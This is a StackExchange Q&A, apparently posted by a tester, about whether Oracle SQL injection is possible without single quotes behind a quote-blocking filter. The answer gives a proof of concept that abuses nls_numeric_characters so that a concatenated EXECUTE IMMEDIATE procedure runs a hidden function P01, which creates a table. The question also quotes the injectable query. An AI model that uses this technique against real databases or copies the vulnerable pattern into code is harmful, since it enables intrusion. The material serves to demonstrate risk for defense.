patternMinor
Is there any way to break out of the string and inject SQL without using a single quote in oracle?
Viewed 0 times
oraclewithoutthesqlanywaystringsingleinjectusing
Problem
I'm testing an oracle based application and I've found the following code:
Query = "SELECT name FROM employees WHERE id='"+PKID+"';"
i.e. the query string contains quotes around the PKID value which is obtained straight from the URL.
Obviously, this is a classic SQL injection waiting to happen...except the application is behind CA SiteMinder which blocks any URL with a single quote (in any form) from being passed to the application.
Is there any way to break out of the string and inject SQL without using a single quote?
Edit: Sorry, I should have been clearer - I understand how it should be written, but I need to persuade people that it's an exploitable issue. At the moment because it's behind siteminder which blocks single quotes so it's going to be a low priority fix.
Query = "SELECT name FROM employees WHERE id='"+PKID+"';"
i.e. the query string contains quotes around the PKID value which is obtained straight from the URL.
Obviously, this is a classic SQL injection waiting to happen...except the application is behind CA SiteMinder which blocks any URL with a single quote (in any form) from being passed to the application.
Is there any way to break out of the string and inject SQL without using a single quote?
Edit: Sorry, I should have been clearer - I understand how it should be written, but I need to persuade people that it's an exploitable issue. At the moment because it's behind siteminder which blocks single quotes so it's going to be a low priority fix.
Solution
Yes, it is possible to perform an SQL injection attack without supplying quotes in the parameter.
The way to do this is with an exploit to do with how numbers and/or dates are processed. You can specify at the session level what the format of a date or number is. By manipulating this you can then inject with any character.
By default in the UK and US, a comma is used to indicate the thousands separator in numbers, and a full stop for the decimal point. You can change these defaults by executing:
This means that "P" is now the decimal point and "Z" is the thousands separator. So:
Is the number 0.01. However, if you create a function P01, the object reference will be picked up before number conversion. This allows you to execute functions on the database giving you increasing powers, as follows:
Create a basic "get by id" function:
Also create a function P01 which does something undesirable (in this case just creating a table, but you get the idea):
And we're good to go:
No quotes anywhere, but we've still managed to execute the "hidden" function P01 and create the table
While this may be difficult to do in practice (and may require some internal knowledge/help), this does show that you can inject SQL without having to have quotes. Altering the
The original findings for numbers were by David Litchfield and you can read his paper here. You can find Tom Kyte's discussion of how dates can be exploited here.
The way to do this is with an exploit to do with how numbers and/or dates are processed. You can specify at the session level what the format of a date or number is. By manipulating this you can then inject with any character.
By default in the UK and US, a comma is used to indicate the thousands separator in numbers, and a full stop for the decimal point. You can change these defaults by executing:
alter session set nls_numeric_characters = 'PZ';This means that "P" is now the decimal point and "Z" is the thousands separator. So:
0P01Is the number 0.01. However, if you create a function P01, the object reference will be picked up before number conversion. This allows you to execute functions on the database giving you increasing powers, as follows:
Create a basic "get by id" function:
create procedure get_obj ( i in number ) as
begin
execute immediate 'select object_name from all_objects where object_id = ' || i;
end;
/Also create a function P01 which does something undesirable (in this case just creating a table, but you get the idea):
create function p01 return number as
pragma autonomous_transaction;
begin
execute immediate 'create table t (x integer)';
return 1;
end;
/And we're good to go:
alter session set nls_numeric_characters = 'PZ';
SELECT * FROM t;
SQL Error: ORA-00942: table or view does not exist
exec get_obj(p01);
anonymous block completed
SELECT * FROM t;
no rows selectedNo quotes anywhere, but we've still managed to execute the "hidden" function P01 and create the table
t!While this may be difficult to do in practice (and may require some internal knowledge/help), this does show that you can inject SQL without having to have quotes. Altering the
nls_date_format can allow similar things to be done.The original findings for numbers were by David Litchfield and you can read his paper here. You can find Tom Kyte's discussion of how dates can be exploited here.
Code Snippets
alter session set nls_numeric_characters = 'PZ';create procedure get_obj ( i in number ) as
begin
execute immediate 'select object_name from all_objects where object_id = ' || i;
end;
/create function p01 return number as
pragma autonomous_transaction;
begin
execute immediate 'create table t (x integer)';
return 1;
end;
/alter session set nls_numeric_characters = 'PZ';
SELECT * FROM t;
SQL Error: ORA-00942: table or view does not exist
exec get_obj(p01);
anonymous block completed
SELECT * FROM t;
no rows selectedContext
StackExchange Database Administrators Q#34546, answer score: 9
Revisions (0)
No revisions yet.